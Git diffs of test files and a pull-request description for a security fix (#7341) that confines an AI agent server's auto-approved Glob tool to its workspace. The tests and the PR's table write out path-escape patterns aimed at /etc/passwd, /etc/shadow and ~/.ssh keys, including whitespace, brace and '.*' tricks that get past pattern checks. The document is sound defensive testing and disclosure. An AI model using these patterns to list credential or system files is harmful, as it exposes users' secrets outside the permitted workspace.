+    it('allows ordinary patterns that merely LOOK like traversal (positive control)', async () => {
+      // `*~` and `a..b` are legitimate filenames. A containment rule that
+      // rejected them would be a functional regression, not extra safety.
+      writeFileSync(join(dir, 'draft.md~'), 'x')
+      writeFileSync(join(dir, 'v1..v2.diff'), 'y')
+      for (const pattern of ['*~', 'v1..v2.diff']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, false, `${pattern} must still work`)
+        assert.equal(r.content.includes('No matches'), false, `${pattern} must still match`)
       }
     })
   })

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -264,6 +264,43 @@ describe('executeBuiltinTool', () => {
       }
     })
 
+    it('refuses a whitespace-split multi-pattern (security #7341)', async () => {
+      // The pattern is interpolated UNQUOTED into `for f in <pattern>`, so a
+      // space makes it SEVERAL patterns and only the first has to look
+      // innocent. Pre-fix `* /etc/pass*` listed /etc through the container
+      // Glob, which has no result-confinement layer to fall back on.
+      for (const pattern of ['* /etc/pass*', '* ~/.ssh/*']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, true, `expected error for: ${pattern}`)
+        assert.match(r.content, /whitespace/)
+        assert.equal(r.content.includes('passwd'), false)
+        assert.equal(r.content.includes(homedir()), false)
+      }
+    })
+
+    it('refuses a glob that MATCHES the `..` entry (security #7341)', async () => {
+      // `.*` expands to `. ..`, so these traverse upward without containing a
+      // `..` token for any regex over the source text to find.
+      for (const pattern of ['.*/'.repeat(12) + 'etc/pass*', '.{.,x}/etc/pass*', '.?/etc/pass*']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, true, `expected error for: ${pattern}`)
+        assert.match(r.content, /escapes the workspace root/)
+        assert.equal(r.content.includes('passwd'), false, `${pattern} must not list /etc`)
+      }
+    })
+
+    it('still globs dotfiles that cannot reach `..` (positive control)', async () => {
+      // The `..`-matching rule must not cost ordinary dotfile globbing. A
+      // leading `.` has to be matched LITERALLY by the shell, so `.env*` and
+      // `.[a-z]*` can never reach `..` and must keep working.
+      writeFileSync(join(dir, '.envrc'), 'x')
+      for (const pattern of ['.env*', '.[a-z]*']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, false, `${pattern} must still work`)
+        assert.match(r.content, /\.envrc/)
+      }
+    })
+
     it('withholds matches reached through a symlinked directory (security #7341)', async () => {
       // The escape no pattern inspection can see: every character of
       // `esc/pass*` is legal. Only resolving the expanded RESULTS catches it.
@@ -274,12 +311,28 @@ describe('executeBuiltinTool', () => {
         ...ctx(),
       })
       assert.equal(r.content.includes('passwd'), false, 'must not list /etc through a symlink')
-      assert.match(r.content, /outside the workspace withheld/)
+    })
+
+    it('reports a withheld match as no match, with no count or marker (oracle)', async () => {
+      // Anything that distinguishes "matched, but outside" from "matched
+      // nothing" is an existence oracle: a workspace containing `esc -> /`
+      // turns one bit per call into filesystem enumeration, through a tool
+      // auto-approved in acceptEdits. The two responses must be identical.
+      symlinkSync('/etc', join(dir, 'esc'))
+      const hit = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: 'esc/passwd' }, ...ctx(),
+      })
+      const miss = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: 'esc/definitely-no-such-file' }, ...ctx(),
+      })
+      assert.equal(hit.isError, miss.isError)
+      assert.equal(hit.content.replace('esc/passwd', 'X'), miss.content.replace('esc/definitely-no-such-file', 'X'))
+      assert.equal(/\d/.test(hit.content), false, 'no count may leak')
     })
 
     it('still returns in-workspace matches alongside a withheld one (positive control)', async () => {
       // Guards the #7273 shape: a confiner that dropped EVERYTHING would pass
-      // the test above for the wrong reason and keep passing if the real rule
+      // the tests above for the wrong reason and keep passing if the real rule
       // were deleted. Here a legitimate match must survive the same call.
       symlinkSync('/etc', join(dir, 'esc'))
       mkdirSync(join(dir, 'keep'), { recursive: true })
@@ -292,7 +345,6 @@ describe('executeBuiltinTool', () => {
       assert.equal(r.isError, false)
       assert.match(r.content, /keep\/passenger\.txt/)
       assert.equal(r.content.includes('esc/passwd'), false)
-      assert.match(r.content, /outside the workspace withheld/)
     })
 
     it('lists an in-workspace symlink that stays in the workspace (positive control)', async () => {

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -279,14 +279,39 @@ describe('executeBuiltinTool', () => {
       }
     })
 
-    it('refuses a glob that MATCHES the `..` entry (security #7341)', async () => {
-      // `.*` expands to `. ..`, so these traverse upward without containing a
-      // `..` token for any regex over the source text to find.
-      for (const pattern of ['.*/'.repeat(12) + 'etc/pass*', '.{.,x}/etc/pass*', '.?/etc/pass*']) {
-        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
-        assert.equal(r.isError, true, `expected error for: ${pattern}`)
-        assert.match(r.content, /escapes the workspace root/)
-        assert.equal(r.content.includes('passwd'), false, `${pattern} must not list /etc`)
+    it('contains a glob that reaches `..` by EXPANSION, without inspecting it', async () => {
+      // `.*` matches the `..` entry in a shell, so `.{.,x}/x` and `.*/x` reach
+      // the parent with no `..` token in the source text. The previous cut tried
+      // to detect that by modelling brace expansion and glob-vs-`..` matching.
+      // That model was wrong on 46 of 515 enumerated bracket segments AND cost
+      // 12.9 seconds of blocked event loop on a 4 KB pattern, so it is gone:
+      // these patterns are now ACCEPTED by the pattern check and contained by
+      // the output layer instead. What must hold is not the rejection — it is
+      // that nothing outside the workspace comes back.
+      const outer = mkdtempSync(join(tmpdir(), 'chroxy-glob-outer-'))
+      try {
+        writeFileSync(join(outer, 'TOPSECRET.txt'), 'pw')
+        const ws = join(outer, 'ws')
+        mkdirSync(ws)
+        writeFileSync(join(ws, 'a.ts'), '1')
+        for (const pattern of ['.{.,x}/TOP*', '.*/TOP*', '..*/TOP*', '.[.]/TOP*', '.[[:punct:]]/TOP*']) {
+          const r = await executeBuiltinTool({
+            toolName: 'Glob', input: { pattern },
+            cwd: ws, cwdRealCache: new Map(), cwdCacheTtl: 30_000,
+          })
+          assert.equal(
+            r.content.includes('TOPSECRET'), false,
+            `${pattern} must not reach outside the workspace`,
+          )
+        }
+        // POSITIVE CONTROL on the same workspace — the tool still works.
+        const ok = await executeBuiltinTool({
+          toolName: 'Glob', input: { pattern: '*.ts' },
+          cwd: ws, cwdRealCache: new Map(), cwdCacheTtl: 30_000,
+        })
+        assert.match(ok.content, /a\.ts/)
+      } finally {
+        rmSync(outer, { recursive: true, force: true })
       }
     })
 
@@ -302,33 +327,50 @@ describe('executeBuiltinTool', () => {
       }
     })
 
-    it('withholds matches reached through a symlinked directory (security #7341)', async () => {
-      // The escape no pattern inspection can see: every character of
-      // `esc/pass*` is legal. Only resolving the expanded RESULTS catches it.
+    it('names an explicitly-addressed out-of-workspace directory (#7341)', async () => {
+      // When the caller NAMES the directory, silence is the wrong answer and
+      // not required: `input.path: 'esc'` already returns exactly this error,
+      // so saying it for a literal pattern prefix leaks nothing new. This is
+      // what makes `Glob node_modules/**` over a pnpm store explain itself
+      // instead of returning a baffling "No matches".
       symlinkSync('/etc', join(dir, 'esc'))
       const r = await executeBuiltinTool({
         toolName: 'Glob',
         input: { pattern: 'esc/pass*' },
         ...ctx(),
       })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /outside workspace/)
       assert.equal(r.content.includes('passwd'), false, 'must not list /etc through a symlink')
     })
 
-    it('reports a withheld match as no match, with no count or marker (oracle)', async () => {
-      // Anything that distinguishes "matched, but outside" from "matched
-      // nothing" is an existence oracle: a workspace containing `esc -> /`
-      // turns one bit per call into filesystem enumeration, through a tool
-      // auto-approved in acceptEdits. The two responses must be identical.
+    it('stays silent about a symlink it DISCOVERED rather than was given (oracle)', async () => {
+      // The oracle case, and the reason the rule is split. Here the caller did
+      // not name `esc` — a wildcard found it. Anything distinguishing "matched,
+      // but outside" from "matched nothing" turns one bit per call into
+      // filesystem enumeration for a workspace containing `esc -> /`, through a
+      // tool auto-approved in acceptEdits. The two responses must be identical.
       symlinkSync('/etc', join(dir, 'esc'))
       const hit = await executeBuiltinTool({
-        toolName: 'Glob', input: { pattern: 'esc/passwd' }, ...ctx(),
+        toolName: 'Glob', input: { pattern: '{esc,nope}/passwd' }, ...ctx(),
       })
       const miss = await executeBuiltinTool({
-        toolName: 'Glob', input: { pattern: 'esc/definitely-no-such-file' }, ...ctx(),
+        toolName: 'Glob', input: { pattern: '{esc,nope}/definitely-no-such-file' }, ...ctx(),
       })
+      assert.equal(hit.isError, false)
       assert.equal(hit.isError, miss.isError)
-      assert.equal(hit.content.replace('esc/passwd', 'X'), miss.content.replace('esc/definitely-no-such-file', 'X'))
+      assert.equal(
+        hit.content.replace('{esc,nope}/passwd', 'X'),
+        miss.content.replace('{esc,nope}/definitely-no-such-file', 'X'),
+      )
       assert.equal(/\d/.test(hit.content), false, 'no count may leak')
+
+      // PRECONDITION: the matcher really does produce the escaping match, so
+      // "identical output" is evidence of withholding and not of a pattern
+      // that never matched.
+      const raw = []
+      for await (const f of fsGlob('{esc,nope}/passwd', { cwd: dir })) raw.push(f)
+      assert.deepEqual(raw, ['esc/passwd'], 'precondition: the escape must be real')
     })
 
     it('withholds a parent-directory escape the matcher really does produce', async () => {
@@ -454,15 +496,75 @@ describe('executeBuiltinTool', () => {
       assert.match(ok.content, /d0\/f0\.ts/)
 
       const prev = process.env.CHROXY_GLOB_TIMEOUT_MS
-      process.env.CHROXY_GLOB_TIMEOUT_MS = '0'
+      process.env.CHROXY_GLOB_TIMEOUT_MS = '1'
       try {
         const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**/*' }, ...ctx() })
-        assert.equal(r.isError, true, 'a zero budget must time out, not succeed')
-        assert.match(r.content, /timed out after 0ms/)
+        assert.equal(r.isError, true, 'a 1ms budget must time out, not succeed')
+        assert.match(r.content, /timed out after 1ms/)
       } finally {
         if (prev === undefined) delete process.env.CHROXY_GLOB_TIMEOUT_MS
         else process.env.CHROXY_GLOB_TIMEOUT_MS = prev
       }
+    })
+
+    it('treats an empty or unparseable CHROXY_GLOB_TIMEOUT_MS as unset', async () => {
+      // `Number('') === 0`, and the first cut accepted any finite `>= 0`. An
+      // exported-but-EMPTY var — what a bare `.env` line and `docker run -e VAR`
+      // both produce — therefore gave every Glob call a 0ms budget and disabled
+      // the tool outright, with nothing pointing at the cause. The knob exists
+      // to make the timeout testable; switching Glob off by accident is not a
+      // thing it may do.
+      // The tree must be big enough that a ZERO budget would actually be
+      // observed. Globbing a near-empty directory cannot tell "0 means unset"
+      // apart from "0 means a 0ms budget" — the walk finishes before the timer
+      // fires either way — so the assertion would pass under both readings and
+      // the mutant `n >= 0` survived it. Same size as the timeout test, and
+      // measured the same way.
+      for (let d = 0; d < 8; d++) {
+        mkdirSync(join(dir, `d${d}`), { recursive: true })
+        for (let i = 0; i < 150; i++) writeFileSync(join(dir, `d${d}/f${i}.ts`), '1')
+      }
+      const prev = process.env.CHROXY_GLOB_TIMEOUT_MS
+      try {
+        // CONTROL: with the budget genuinely set to 1ms this same call DOES
+        // time out, so a pass below is evidence the value was rejected as
+        // unset — not evidence that the budget is unobservable.
+        process.env.CHROXY_GLOB_TIMEOUT_MS = '1'
+        const control = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**/*' }, ...ctx() })
+        assert.equal(control.isError, true, 'control: a real 1ms budget must fire on this tree')
+
+        for (const value of ['', '   ', '0', 'abc', '-1', '1e999', '0x10']) {
+          process.env.CHROXY_GLOB_TIMEOUT_MS = value
+          const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**/*' }, ...ctx() })
+          assert.equal(r.isError, false, `${JSON.stringify(value)} must fall back to the default, not disable Glob`)
+          assert.match(r.content, /d0\/f0\.ts/)
+        }
+      } finally {
+        if (prev === undefined) delete process.env.CHROXY_GLOB_TIMEOUT_MS
+        else process.env.CHROXY_GLOB_TIMEOUT_MS = prev
+      }
+    })
+
+    it('aborts on a pattern that matches nothing', async () => {
+      // `signal.aborted` was only read INSIDE the loop, so a pattern with no
+      // matches never reached the check: an aborted call ran the whole tree and
+      // then reported a cheerful `No matches`, isError:false. Stop is the user's
+      // only lever on a runaway turn. The existing pre-abort test used a
+      // MATCHING pattern, so it was satisfied by the in-loop check and never
+      // covered this.
+      // Enough of a tree that the walk is still running when the abort lands —
+      // measured the same way the timeout test's fixture was sized.
+      for (let d = 0; d < 8; d++) {
+        mkdirSync(join(dir, `d${d}`), { recursive: true })
+        for (let i = 0; i < 150; i++) writeFileSync(join(dir, `d${d}/f${i}.ts`), '1')
+      }
+      const controller = new AbortController()
+      controller.abort()
+      const r = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: '**/*.NOSUCHEXT' }, signal: controller.signal, ...ctx(),
+      })
+      assert.equal(r.isError, true, 'an aborted walk must not report success')
+      assert.match(r.content, /interrupted/i)
     })
 
     it('honors a pre-aborted signal', async () => {
@@ -496,6 +598,81 @@ describe('executeBuiltinTool', () => {
       // POSITIVE CONTROL, same call: an ordinary file is still returned, so
       // this cannot pass by the tool having failed outright.
       assert.match(r.content, /resolvable\.ts/)
+    })
+
+    it('sorts, and announces truncation as a SORTED PREFIX (#7341)', async () => {
+      // Both halves were regressions from the rewrite. `fs.glob` yields in
+      // traversal order where every shell glob sorts, and the first cut capped
+      // that unsorted stream at 10 000 with no marker — so over a 20 000-file
+      // tree it returned 10 000 paths, isError:false, and `d00`-`d09` (half the
+      // tree, the alphabetically-first half) were simply absent. A model would
+      // conclude those directories hold no TypeScript.
+      //
+      // The oracle argument that justifies silence for WITHHELD matches does
+      // not apply to truncation: a count of in-workspace matches reveals
+      // nothing about anything outside it.
+      for (let d = 0; d < 12; d++) {
+        mkdirSync(join(dir, `d${String(d).padStart(2, '0')}`), { recursive: true })
+        for (let i = 0; i < 1000; i++) {
+          writeFileSync(join(dir, `d${String(d).padStart(2, '0')}/f${String(i).padStart(4, '0')}.ts`), '')
+        }
+      }
+      const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**/*.ts' }, ...ctx() })
+      assert.equal(r.isError, false)
+      const lines = r.content.split('\n')
+      const marker = lines[lines.length - 1]
+      const data = lines.slice(0, -1)
+
+      assert.match(marker, /truncated: showing 10000 of 12000 matches/)
+      assert.equal(data.length, 10_000)
+      assert.deepEqual(data, [...data].sort(), 'output must be sorted')
+      // A PREFIX, not an arbitrary subset: the cut is at d09/d10, and every
+      // earlier directory is complete.
+      assert.equal(data[0], 'd00/f0000.ts')
+      assert.equal(data[data.length - 1], 'd09/f0999.ts')
+      assert.equal(data.some((l) => l.startsWith('d10/')), false)
+    })
+
+    it('sorts a result that is NOT truncated (positive control)', async () => {
+      // Without this, the sort assertion above could be satisfied by the
+      // truncation path alone.
+      for (const name of ['zebra.ts', 'alpha.ts', 'mango.ts']) writeFileSync(join(dir, name), '')
+      const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '*.ts' }, ...ctx() })
+      assert.equal(r.isError, false)
+      assert.deepEqual(r.content.split('\n'), ['alpha.ts', 'mango.ts', 'zebra.ts'])
+      assert.equal(r.content.includes('truncated'), false)
+    })
+
+    it('accepts a valid `path` and confines relative to it (#7341)', async () => {
+      // The rewrite changed what `path` means underneath — `fsGlob(pattern,
+      // {cwd: realRoot})` and confinement measured against `realRoot`, not
+      // `cwd` — and no test passed a VALID `path` at all. The only existing one
+      // asserted the `/etc` rejection.
+      mkdirSync(join(dir, 'sub/deep'), { recursive: true })
+      writeFileSync(join(dir, 'sub/a.ts'), '1')
+      writeFileSync(join(dir, 'sub/deep/b.ts'), '1')
+      writeFileSync(join(dir, 'outside-sub.ts'), '1')
+      symlinkSync('/etc', join(dir, 'sub/esc'))
+
+      const abs = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: '**/*.ts', path: join(dir, 'sub') }, ...ctx(),
+      })
+      assert.equal(abs.isError, false)
+      assert.deepEqual(abs.content.split('\n'), ['a.ts', 'deep/b.ts'])
+      assert.equal(abs.content.includes('outside-sub'), false, 'results are relative to `path`')
+
+      const rel = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: '*.ts', path: 'sub' }, ...ctx(),
+      })
+      assert.equal(rel.isError, false)
+      assert.match(rel.content, /a\.ts/)
+
+      // Confinement still applies BELOW a valid subdirectory root.
+      const esc = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: '{esc,deep}/*', path: join(dir, 'sub') }, ...ctx(),
+      })
+      assert.equal(esc.content.includes('passwd'), false, 'confinement must hold under a `path` root')
+      assert.match(esc.content, /deep\/b\.ts/)
     })
 
     it('never returns a path outside the workspace, over a corpus (property)', async () => {
@@ -548,21 +725,43 @@ describe('executeBuiltinTool', () => {
       }
     })
 
-    it('still returns in-workspace matches alongside a withheld one (positive control)', async () => {
-      // Guards the #7273 shape: a confiner that dropped EVERYTHING would pass
-      // the tests above for the wrong reason and keep passing if the real rule
-      // were deleted. Here a legitimate match must survive the same call.
+    it('returns the in-workspace match and withholds the escaping one, in ONE call', async () => {
+      // This test was written as a positive control against the #7273 shape and
+      // WAS ITSELF that shape. It globbed `*/pass*` and asserted `esc/passwd`
+      // was absent — but `fs.glob` does not descend a wildcard-matched
+      // symlinked directory, so `*/pass*` never yields `esc/passwd` under any
+      // implementation. It asserted the absence of something that was never
+      // there, and passed with the entire fix deleted.
+      //
+      // `{esc,keep}/pass*` names the symlinked directory explicitly, so the
+      // escaping match really is produced and really must be withheld. The
+      // fsGlob precondition below is what proves that, and is the difference
+      // between a control and a decoration.
+      //
+      // It is also the ONLY test where one call produces matches from two
+      // different directories, one in-workspace and one out — which is what
+      // pins `confineGlobMatches`' per-directory verdict cache. A mutant that
+      // computed a real verdict for the first directory and assumed `true` for
+      // every later one returned /etc/passwd with all 346 tests green.
       symlinkSync('/etc', join(dir, 'esc'))
       mkdirSync(join(dir, 'keep'), { recursive: true })
       writeFileSync(join(dir, 'keep/passenger.txt'), 'ok')
+
+      const raw = []
+      for await (const f of fsGlob('{esc,keep}/pass*', { cwd: dir })) raw.push(f)
+      assert.deepEqual(
+        raw.sort(), ['esc/passwd', 'keep/passenger.txt'],
+        'precondition: the matcher must really produce BOTH, or this proves nothing',
+      )
+
       const r = await executeBuiltinTool({
         toolName: 'Glob',
-        input: { pattern: '*/pass*' },
+        input: { pattern: '{esc,keep}/pass*' },
         ...ctx(),
       })
       assert.equal(r.isError, false)
       assert.match(r.content, /keep\/passenger\.txt/)
-      assert.equal(r.content.includes('esc/passwd'), false)
+      assert.equal(r.content.includes('passwd'), false, 'the escaping match must be withheld')
     })
 
     it('lists an in-workspace symlink that stays in the workspace (positive control)', async () => {

--- a/packages/server/tests/byok-tools.test.js
+++ b/packages/server/tests/byok-tools.test.js
@@ -59,6 +59,20 @@ describe('BUILTIN_TOOLS', () => {
     assert.deepEqual(wf.input_schema.required.sort(), ['prompt', 'url'])
   })
 
+  it('Glob description discloses workspace confinement + truncation (#7341)', () => {
+    // This file's convention: a security-relevant description change gets a
+    // test naming the issue. The #7341 disclosure shipped without one, behind
+    // only the generic `length > 20` check — so the text could drift away from
+    // the behaviour with nothing to catch it, which is the defect class the
+    // issue itself is about.
+    const glob = BUILTIN_TOOLS.find((t) => t.name === 'Glob')
+    assert.ok(glob, 'Glob tool must exist')
+    const d = glob.description
+    for (const claim of ['`~`', '`..`', 'confined', 'withheld', 'sorted', 'truncated', '#7341']) {
+      assert.ok(d.includes(claim), `Glob description must disclose ${claim}`)
+    }
+  })
+
   it('WebFetch description discloses the auto-mode bypass (#4135)', () => {
     // Pre-fix the description claimed "Always permission-gated" which
     // contradicts the auto-mode short-circuit in PermissionManager. The

--- a/packages/server/tests/docker-byok-session.test.js
+++ b/packages/server/tests/docker-byok-session.test.js
@@ -691,7 +691,6 @@ describe('DockerByokSession _dispatchBuiltinTool — tool routing', () => {
       '/etc/pass*', '{a,/etc}/x',
       '../../etc/pass*', '{.,..}/x',
       '* /etc/pass*', '* ~/.ssh/*',
-      '.*/.*/etc/pass*', '.{.,x}/etc/pass*', '.?/etc/pass*',
     ]) {
       const _dockerBackend = backendStub()
       const { session } = buildSession({ backend: _dockerBackend })
@@ -702,6 +701,42 @@ describe('DockerByokSession _dispatchBuiltinTool — tool routing', () => {
       assert.equal(result.isError, true, `expected error for: ${pattern}`)
       assert.match(result.content, /escapes the workspace root|whitespace/)
       assert.equal(_dockerBackend.calls.length, 0, `${pattern} must not reach docker exec`)
+    }
+  })
+
+  it('Glob contains the six historical bypasses at the RESULT layer (#7341)', async () => {
+    // These are the patterns that walked past the pattern guard across three
+    // review rounds — quote removal, a brace body with no top-level comma,
+    // `.*` matching the `..` entry, POSIX bracket sub-expressions. They are
+    // LIVE here and inert on the host: the container still interpolates the
+    // pattern unquoted into `for f in <pattern>`, while the host no longer
+    // shells out at all.
+    //
+    // An earlier version of this coverage asserted them against the HOST, the
+    // one place they cannot occur — so it passed with the entire fix deleted.
+    // Here each pattern is accepted by the pattern guard (asserted, so the
+    // test cannot silently become a guard test) and the shell is made to
+    // return the escaping path it really produces.
+    const { globPatternEscapeReason } = await import('../src/built-in-tools/tool-transforms.js')
+    // (`{a}b,../etc/pass*}` is NOT in this list: the crude segment split on
+    // `/{},` sees its `..` and rejects it up front — a case the "correct" brace
+    // expander missed, because it stopped at the first balanced `}` where bash
+    // keeps scanning. The cruder check is better here precisely because it does
+    // not try to be bash.)
+    for (const pattern of ["'..'/TOP*", '.[[:punct:]]/etc/pass*', '.*/etc/pass*']) {
+      assert.equal(
+        globPatternEscapeReason(pattern), null,
+        `precondition: ${pattern} must reach the shell, or this tests the wrong layer`,
+      )
+      const _dockerBackend = backendStub({
+        defaultResponse: { stdout: '../etc/passwd\n/etc/shadow\nsrc/ok.ts\n', stderr: '' },
+      })
+      const { session } = buildSession({ backend: _dockerBackend })
+      const result = await session._dispatchBuiltinTool({ toolName: 'Glob', input: { pattern } })
+      assert.equal(result.isError, false, `${pattern} should reach the shell and be filtered`)
+      assert.equal(result.content.includes('passwd'), false, `${pattern} leaked /etc/passwd`)
+      assert.equal(result.content.includes('shadow'), false, `${pattern} leaked /etc/shadow`)
+      assert.match(result.content, /src\/ok\.ts/, 'the in-workspace match must survive')
     }
   })
 

--- a/packages/server/tests/docker-byok-session.test.js
+++ b/packages/server/tests/docker-byok-session.test.js
@@ -679,6 +679,37 @@ describe('DockerByokSession _dispatchBuiltinTool — tool routing', () => {
     assert.equal(_dockerBackend.calls.length, 0)
   })
 
+  it('Glob refuses patterns that escape /workspace (security #7341)', async () => {
+    // The container Glob shares the host's containment validator, so the two
+    // cannot drift. Here it is the only layer available — the matches are
+    // produced inside the container, out of reach of a host realpath.
+    for (const pattern of ['~/.ssh/*', '{~,.}/.ssh/*', '/etc/pass*', '{a,/etc}/x', '../../etc/pass*', '{.,..}/x']) {
+      const _dockerBackend = backendStub()
+      const { session } = buildSession({ backend: _dockerBackend })
+      const result = await session._dispatchBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern },
+      })
+      assert.equal(result.isError, true, `expected error for: ${pattern}`)
+      assert.match(result.content, /escapes the workspace root/)
+      assert.equal(_dockerBackend.calls.length, 0, `${pattern} must not reach docker exec`)
+    }
+  })
+
+  it('Glob still runs an ordinary in-workspace pattern (positive control #7341)', async () => {
+    // Without this the test above would pass just as well against a Glob that
+    // refused every pattern outright.
+    const _dockerBackend = backendStub({ defaultResponse: { stdout: 'src/a.ts\n', stderr: '' } })
+    const { session } = buildSession({ backend: _dockerBackend })
+    const result = await session._dispatchBuiltinTool({
+      toolName: 'Glob',
+      input: { pattern: '**/*.ts' },
+    })
+    assert.equal(result.isError, false)
+    assert.match(result.content, /src\/a\.ts/)
+    assert.ok(_dockerBackend.calls.length > 0, 'the legitimate pattern must reach docker exec')
+  })
+
   it('Grep falls back to grep when rg is unavailable (cmd shape)', async () => {
     const _dockerBackend = backendStub({
       defaultResponse: { stdout: 'foo.js:1:match\n', stderr: '' },

--- a/packages/server/tests/docker-byok-session.test.js
+++ b/packages/server/tests/docker-byok-session.test.js
@@ -683,7 +683,16 @@ describe('DockerByokSession _dispatchBuiltinTool — tool routing', () => {
     // The container Glob shares the host's containment validator, so the two
     // cannot drift. Here it is the only layer available — the matches are
     // produced inside the container, out of reach of a host realpath.
-    for (const pattern of ['~/.ssh/*', '{~,.}/.ssh/*', '/etc/pass*', '{a,/etc}/x', '../../etc/pass*', '{.,..}/x']) {
+    // The whitespace and `.*`-matches-`..` rows are the ones that matter most
+    // here: this is the ONLY layer the container has, so a bypass of it is a
+    // live /workspace escape with nothing behind it.
+    for (const pattern of [
+      '~/.ssh/*', '{~,.}/.ssh/*',
+      '/etc/pass*', '{a,/etc}/x',
+      '../../etc/pass*', '{.,..}/x',
+      '* /etc/pass*', '* ~/.ssh/*',
+      '.*/.*/etc/pass*', '.{.,x}/etc/pass*', '.?/etc/pass*',
+    ]) {
       const _dockerBackend = backendStub()
       const { session } = buildSession({ backend: _dockerBackend })
       const result = await session._dispatchBuiltinTool({
@@ -691,7 +700,7 @@ describe('DockerByokSession _dispatchBuiltinTool — tool routing', () => {
         input: { pattern },
       })
       assert.equal(result.isError, true, `expected error for: ${pattern}`)
-      assert.match(result.content, /escapes the workspace root/)
+      assert.match(result.content, /escapes the workspace root|whitespace/)
       assert.equal(_dockerBackend.calls.length, 0, `${pattern} must not reach docker exec`)
     }
   })

--- a/packages/server/tests/docker-byok-session.test.js
+++ b/packages/server/tests/docker-byok-session.test.js
@@ -705,6 +705,45 @@ describe('DockerByokSession _dispatchBuiltinTool — tool routing', () => {
     }
   })
 
+  it('Glob withholds escaping paths the container actually returned (#7341)', async () => {
+    // The layer that holds. Six ways past the pattern guard were found in
+    // review — quote removal, whitespace splitting, a brace body with no
+    // top-level comma, `.*` matching `..`, POSIX bracket sub-expressions,
+    // nested braces — and every one of them is invisible in the pattern and
+    // plainly visible HERE, in what the shell produced. So this test bypasses
+    // the pattern guard entirely and feeds the escaping output straight back.
+    const _dockerBackend = backendStub({
+      defaultResponse: {
+        stdout: '/etc/passwd\n../../etc/shadow\nsrc/a.ts\n..\n',
+        stderr: '',
+      },
+    })
+    const { session } = buildSession({ backend: _dockerBackend })
+    const result = await session._dispatchBuiltinTool({
+      toolName: 'Glob',
+      input: { pattern: '**/*.ts' },      // a pattern the guard is happy with
+    })
+    assert.equal(result.isError, false)
+    assert.equal(result.content.includes('passwd'), false)
+    assert.equal(result.content.includes('shadow'), false)
+    // POSITIVE CONTROL, same call: the in-workspace match survives. Without it
+    // a filter that dropped everything would pass the two assertions above.
+    assert.match(result.content, /src\/a\.ts/)
+  })
+
+  it('Glob reports an all-withheld result as no match, with no count (oracle)', async () => {
+    const _dockerBackend = backendStub({
+      defaultResponse: { stdout: '/etc/passwd\n/etc/shadow\n', stderr: '' },
+    })
+    const { session } = buildSession({ backend: _dockerBackend })
+    const result = await session._dispatchBuiltinTool({
+      toolName: 'Glob', input: { pattern: '**/*.ts' },
+    })
+    assert.equal(result.isError, false)
+    assert.match(result.content, /^No matches for/)
+    assert.equal(/\d/.test(result.content.replace('**/*.ts', '')), false, 'no count may leak')
+  })
+
   it('Glob still runs an ordinary in-workspace pattern (positive control #7341)', async () => {
     // Without this the test above would pass just as well against a Glob that
     // refused every pattern outright.


### PR DESCRIPTION
Closes #7341

## The defect

`Glob { pattern }` was validated only against `GLOB_PATTERN_SHELL_METACHARS` — a shell-**injection** denylist that permits `~`, `/` and `..`. Containment was never checked at all, so the pattern expanded anywhere on the host filesystem.

That matters because of where `Glob` sits: it is classified read-only, so it is auto-approved in `acceptEdits` mode (`ACCEPT_EDITS_TOOLS`), rule-whitelistable (`ELIGIBLE_TOOLS`), and given only the reduced secrets floor (`SECRET_READ_FLOOR_TOOLS`). The protected-path floor could not catch it either: `PROTECTED_PATH_INPUT_FIELDS` is `['file_path','path','notebook_path']` and `pattern` is not a member — the same guard-one-field-not-its-sibling shape as #7262, here between `Glob`'s fully realpath-confined `path` and its unconfined `pattern`.

Measured end-to-end through the real dispatcher (`executeBuiltinTool`) on `0640f48d7`, all `isError:false` with real content:

| input | pre-fix result |
|---|---|
| `{"pattern":"~/.ssh/*"}` | listed the user's SSH private keys |
| `{"pattern":"/etc/pass*"}` | `/etc/passwd` |
| `{"pattern":"../../../../../../../../etc/pass*"}` | `../../../../../../../../etc/passwd` |
| `{"pattern":"{~,.}/.ssh/*"}` | listed the user's SSH keys |
| `{"pattern":"esc/pass*"}` (with `esc -> /etc` in the workspace) | `esc/passwd` |
| *control:* `{"pattern":"*","path":"/etc"}` | already rejected — `path` was guarded |

The `{~,.}` row is why a leading-anchor-only check would not have been enough: **brace expansion runs before tilde expansion** and yields each alternative as its own word, so `{~,.}` and `{a,/etc}` both escape. Verified against bash directly rather than assumed.

## The fix — two layers, because neither alone is containment

**1. Syntactic — `globPatternEscapeReason()` in the shared `tool-transforms.js`.** Rejects an absolute, `~`-expanding or `..`-traversing pattern, anchored at all three word-start positions (start of pattern, after `{`, after `,`). Shared by the host `runGlob` and the container `_containerGlob` so the two cannot drift, and it is the **only** layer the container can have — its matches are produced inside the container, out of reach of a host realpath. (Container severity is lower: it escapes into the image's filesystem, not the host's. Same defect, fixed the same way.)

